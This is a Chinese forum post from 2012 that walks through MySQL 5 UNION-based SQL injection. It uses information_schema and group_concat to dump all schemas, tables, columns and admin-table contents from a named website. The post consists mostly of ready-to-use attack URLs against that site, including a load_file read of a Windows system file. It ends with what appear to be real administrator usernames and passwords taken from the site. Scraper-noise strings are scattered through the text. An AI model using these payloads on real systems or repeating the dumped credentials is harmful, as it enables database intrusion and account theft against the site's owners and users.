此方法只适用于Mysql 5.0以及5.0以上版本 注入方法和mysql 5 类似
6 h) h8 o3 j& n" x但此方法大大提高了读取数据库的速度,此方法并非本人原创,原创出处是国外某牛人6 Z* h5 X0 p* f E! T
$ T" ]/ Q+ N) Y3 L" t- y; ~5 m3 J
& ]5 T3 R2 {" C; W9 }) T
优点在于可以利用information_schema库与group_concat的配合 来达到一次性读取出指定数据库里的内容,并且在limit被限制的情况下依然可以注入$ Z1 L9 x! g) d$ M. j
8 {4 F* ]$ E5 O1 X
缺点 当一个库存在几百甚至几千个表和表字段和数据的时候 读取出数据的时间会相当的慢...
* r7 S* {' M: _6 I# J& m5 q+ S1 G: a
下面用简单实例来演示 原理不多说,相信经常玩注入的朋友都知道了.只挑重要部分实例演示8 M5 X: d0 O* s9 V
在注入时根据实际情况作出变化 比如过滤了空格,使用/**/ , + 等等
# j7 T/ a6 O; I! a7 M, q+ w- f. R5 N& D6 _9 z6 F
http://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,database(),10,11,12,13,14,15,16,17
9 F& V4 ?' K2 A' k& K8 }% e2 K6 C' n9 M) N" a+ s
读出所有库:
# t- q$ V; V0 \- u6 Hhttp://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,group_concat(schema_name),10,11,12,13,14,15,16,17 from information_schema.SCHEMATA- ~, f: p' q6 Q2 l8 z3 s
# E( ^/ a3 g9 B2 Z; b
$ l0 T/ h( C j+ w, ] H# v
, @* K* K) H1 s: P: f读出所有表:
% p3 n- N8 Y( f+ @+ p% |http://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,group_concat(table_name),10,11,12,13,14,15,16,17 from information_schema.tables where table_schema=database()
; Q- { N! s& J. t, W. k; z& X5 _6 O+ |$ J: e+ }, O- x' _
读出所有表字段:, [- h N6 R2 \) F: m
http://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,group_concat(column_name),10,11,12,13,14,15,16,17 from information_schema.COLUMNS where table_schema=database() and table_name=char(97,100,109,105,110)
" C0 `+ c8 I$ _$ G* N*/ (97,100,109,105,110)为admin的ascii码 依次类推 H8 }. d7 Y% @
# _0 w- L4 O# p* k& |. b- s
读出所有表字段里的内容:
0 y& |' c) r- ^( o' T% F) k& n- y& r" Whttp://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,group_concat(password),group_concat(admin),10,11,12,13,14,15,16,17 from admin8 z4 ?6 H! s% D9 U0 u m' z
5 b. v- y4 M1 P3 v5 m( x$ r" o2 S# T% B5 R8 T
6 M- F& H" N. x+ G. S5 H
/ l5 e3 }. j1 c1 f' v1 H
8 {3 t9 g* V6 A+ {# e* n
+ f' s; o5 i& X7 _: s+ shttp://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),load_file(CHAR(99, 58, 92, 98, 111, 111, 116, 46, 105, 110, 105)),4,5,6,7+%23
~5 P& S2 r. t `7 y3 p
# _" _- \& i: z3 p/ A$ U8 y
8 n$ w( ?: \! J) qhttp://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),group_concat(schema_name),4,5,6,7+from+information_schema.schemata%23. J; |% T" i# X9 g; u8 _# U
& c3 M, `' w `7 u$ d
http://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),group_concat(column_name),4,5,6,7+from+information_schema.COLUMNS where table_schema=database()+and+table_name=char(97,100,109,105,110)%23' i4 p' A$ m/ f: M+ e D
" Y1 w2 \5 C. v
' K( [* ~ {1 R% Ohttp://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),group_concat(admin_name,0x3a,admin_password),4,5,6,7+from+admin%23% ?8 l# B7 C- X
8 |% K" i7 X' x5 ~
2 ]- g8 O0 n% j; E: z9 G. v u webmaster:dzb521123,simlab:simadmin20043233' P9 j$ B5 @3 x. I1 f0 C S; @: I
|
发表于 2012-9-13 16:37:34
收藏
支持
反对